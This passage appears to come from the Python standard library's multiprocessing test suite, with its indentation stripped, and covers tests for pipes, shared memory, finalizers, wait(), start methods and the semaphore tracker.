new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
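# Tests for the private memory heap that backs sharedctypes allocations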
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
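# Simple ctypes Structure used to exercise sharing of composite types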
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: the Listener should reject an address whose family is invalid for the platform
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing the process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
pid = _semaphore_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("semaphore_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGTERM, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class MiscTestCase(unittest.TestCase):
